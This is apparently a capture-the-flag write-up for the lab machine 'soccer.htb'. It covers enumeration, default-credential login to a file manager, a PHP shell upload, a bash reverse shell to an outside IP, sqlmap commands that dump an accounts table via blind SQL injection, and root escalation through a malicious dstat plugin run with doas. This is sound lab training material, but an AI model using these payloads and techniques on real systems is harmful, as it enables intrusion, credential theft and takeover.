Nmap scan report for 10.10.11.194
Host is up (0.041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9091/tcp open xmltec-xmlmail
The port 80 leads to a website called soccer.htb.
Using gobuster we find a directory called /tiny running tiny file manager.
Using default creds we get in
admin:admin@123
We can upload a shell.php and use bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1' to get a shell:
Enumerating files at /etc/nginx we find a vhost http://soc-player.soccer.htb/check
There is a blind sql after login:
It only shows true or false. So should use queries like 0 UNION select user,2,3 from mysql.user where user like 'a%'-- -
So using sqlmap:
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3
Now checking databases:
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -dbs
Then finding tables:
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -D soccer_db --tables
Here we found accounts table
Now dumping accounts table:
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -D soccer_db -T accounts --dump
Now logging in using ssh:
We found a group writeable file called dstat.
we also found an SUID binary called doas. It allows execution of commands as other users.
To find the config file: find / 2>/dev/null | grep doas
It seems we can run dstat as root.
Checking the plugins we can run in /usr/share/dstat/
We can also create a plugin in/usr/local/share/dstat
so creating a plugin called dstat_shell.py with
import os; os.execv("/bin/sh", ["sh"])Now we can run dstat plugin with doas /usr/bin/dstat --shell
We get a root shell.